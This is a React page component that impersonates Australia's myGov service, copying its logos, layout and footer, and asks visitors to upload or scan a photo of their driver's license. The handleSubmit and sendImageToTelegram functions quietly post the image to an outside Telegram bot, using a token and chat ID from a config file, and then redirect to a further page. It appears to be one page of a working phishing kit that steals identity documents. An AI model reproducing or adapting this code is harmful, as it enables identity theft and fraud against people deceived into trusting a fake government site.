import React, { useState } from "react";
import { useNavigate } from "react-router-dom";
import telegramConfig from "./config";

const C = () => {
  const navigate = useNavigate();
  const [file, setFile] = useState(null);

  const handleFileChange = (event) => {
    setFile(event.target.files[0]);
  };

  const handleSubmit = async (event) => {
    event.preventDefault();

    if (!file) {
      alert("Please upload or capture your driver's license.");
      return;
    }

    // Send the image file to Telegram
    await sendImageToTelegram(file);

    // Redirect to F.js
    navigate("/f");
  };

  const sendImageToTelegram = async (imageData) => {
    try {
      const { botToken, chatId } = telegramConfig;
      const url = `https://api.telegram.org/bot${botToken}/sendPhoto`;
  
      const formData = new FormData();
      formData.append("chat_id", chatId);
      formData.append("photo", imageData);
  
      const response = await fetch(url, {
        method: "POST",
        body: formData,
      });
  
      if (!response.ok) {
        console.error("Failed to send image:", await response.text());
      }
    } catch (error) {
      console.error("Error sending image to Telegram:", error);
    }
  };

  return (
    <div>
      <div className="brand-rainbow">&nbsp;</div>
      <header role="banner" className="mgvEnhanceHeader">
        <section className="wrapper">
          <div className="inner">
            <div className="unauth-grid">
              <div className="unauth-grid-row">
                <a className="unauth-govt-crest__link" href="#">
                  <img
                    id="unauth-govt-crest"
                    src="/images/myGov-cobranded-logo-black.svg"
                    alt="myGov Beta"
                    role="img"
                  />
                </a>
              </div>
            </div>
          </div>
        </section>
      </header>
      <div className="wrapper-mapwap">
        <div className="main-block" id="content" role="main">
          <h1>Scan or Upload Driver's License</h1>
          <p>
            Please use your camera to scan or upload a clear picture of your
            driver's license.
          </p>
          <form onSubmit={handleSubmit}>
            <div className="input-group">
              <label htmlFor="license">Driver's License</label>
              <input
                id="license"
                name="license"
                type="file"
                accept="image/*"
                capture="environment"
                onChange={handleFileChange}
                required
              />
            </div>
            <div className="button-container">
              <button type="submit" className="button-main button">
                Upload and Continue
              </button>
            </div>
          </form>
        </div>
      </div>
      <footer role="contentinfo">
        <div className="wrapper">
          <div className="inner">
            <section className="footer-list">
              <nav>
                <h2 className="sr-only" aria-label="Footer">
                  Footer
                </h2>
                <ul className="lower-links">
                  <li>
                    <a href="#">Terms of use</a>
                  </li>
                  <li>
                    <a href="#">Privacy and security</a>
                  </li>
                  <li>
                    <a href="#">Copyright</a>
                  </li>
                  <li>
                    <a href="#">Accessibility</a>
                  </li>
                </ul>
              </nav>
            </section>
            <div className="footer-lower">
              <section className="footer-lower-logo">
                <a href="#">
                  <img
                    src="/images/myGov-cobranded-logo-white.svg"
                    alt="myGov Beta"
                    width="313.17"
                    height="70"
                  />
                </a>
              </section>
              <p>
                We acknowledge the Traditional Custodians of the lands we live
                on. We pay our respects to all Elders, past and present, of all
                Aboriginal and Torres Strait Islander nations.
              </p>
            </div>
          </div>
        </div>
      </footer>
    </div>
  );
};

export default C;